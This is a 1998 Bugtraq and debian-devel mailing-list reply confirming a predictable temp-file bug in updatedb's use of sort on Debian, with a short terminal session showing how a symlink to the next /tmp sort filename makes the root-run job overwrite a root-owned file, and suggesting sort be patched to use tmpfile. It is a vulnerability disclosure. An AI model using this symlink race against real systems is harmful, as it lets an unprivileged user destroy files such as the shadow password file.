Re: overwrite any file with updatedb

To: Bryan Andregg <bandregg@REDHAT.COM>
Cc: BUGTRAQ@NETSPACE.ORG, Debian Developers List <debian-devel@lists.debian.org>
Subject: Re: overwrite any file with updatedb
From: Remco Blaakmeer <remco@blaakmeer.student.utwente.nl>
Date: Tue, 3 Mar 1998 10:39:05 +0100 (CET)
Message-id: <[🔎] Pine.LNX.3.96.980303101845.13834D-100000@blaakmeer.student.utwente.nl>
In-reply-to: <199803030011.TAA24316@sideshow.redhat.com>

This message is crossposted to the Bugtraq and debian-devel mailing lists.
Please post replies to the relevant list(s) only.

On Mon, 2 Mar 1998, Bryan Andregg wrote:

> On Sun, 1 Mar 1998 22:44:11 -0500, Cain wrote:
> 
> >If this is already known, my apologies. It seemed very strange that this
> >worked, so I thought it would be mentionable.
> >
> >On many linux systems(Redhat imparticularly) updatedb is run nightly
> >around 1:00. When it sorts the files that find gets, it creats a few files
> >in /tmp called sort0<pid>000{1,2,etc}. Each is around 512k. The
> >first file is created and filled, then if necassary, another is created
> >and so on until it has your whole filesystem into a nice database. Well,
> >once the first file is created you can easily guess what the next filename
> >will be called as only the last character will change. If you create a
> >link to say, the shadow password file, updatedb will kindly overwrite it
> >for you. Ex:
> 
> It should be pointed out that on Red Hat 4.2 and 5.0 updatedb runs as user
> nobody by default.
> 
> This is not a security issue unless you are running a distribution at least a
> year old.
> 
> We will be checking for the proper use of temp files in the source also.

I don't have a Red Hat system at hands to test this, so let me tell you
what it's like on a Debian pre-2.0 system, which I am currently using.

On my system, this bug is present.

Daily, cron runs "run-parts /etc/cron.daily" as root. In this directory is
a file named "find" with these contents:

----begin----
#! /bin/sh
#
# cron script to update the `find.codes' database.
#
# Written by Ian A. Murdock <imurdock@debian.org> and 
#            Kevin Dalley <kevin@aimnet.com>

if [ -f /etc/updatedb.conf ]; then
  . /etc/updatedb.conf
fi

cd / && updatedb --localuser=nobody 2>/dev/null
----end----

/usr/bin/updatedb is a bash script which calls sort to sort the file
lists. Thus, sort runs as root.

This makes the whole thing easy to exploit (things between dashes are
comment):

# touch /root/testfile
# ls -l /root/testfile
-rw-r--r--   1 root     root            0 Mar  3 10:16 /root/testfile
# /etc/cron.daily/find

-- other xterm --

$ cd /tmp
$ ls
sort1636700000
$ ln -s /root/testfile sort1636700002

-- wait a while --

$ ls
sort1636700000  sort1636700001  sort1636700002  sort1636700003

-- other xterm --

# ls -l /root/testfile
-rw-r--r--   1 root     root       524275 Mar  3 10:27 /root/bla

-- end of session --

I think the only way to really fix this is to patch sort, so that it
doesn't create files with easy-to-predict names. See "man 3 tmpfile" for a
good hint on this.

Remco Blaakmeer
Owner of a Debian GNU/Linux system


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-request@lists.debian.org . 
Trouble?  e-mail to templin@bucknell.edu .

Reply to:

Follow-Ups:
- Re: overwrite any file with updatedb
  - From: Bryan Andregg <bandregg@redhat.com>

Prev by Date: Re: outgoing SMTP and dynamic DNS
Next by Date: Intent to package Pd and Gem
Previous by thread: Re: Uploaded sgml-data 0.4 (source all) to masterssh
Next by thread: Re: overwrite any file with updatedb
Index(es):
- Date
- Thread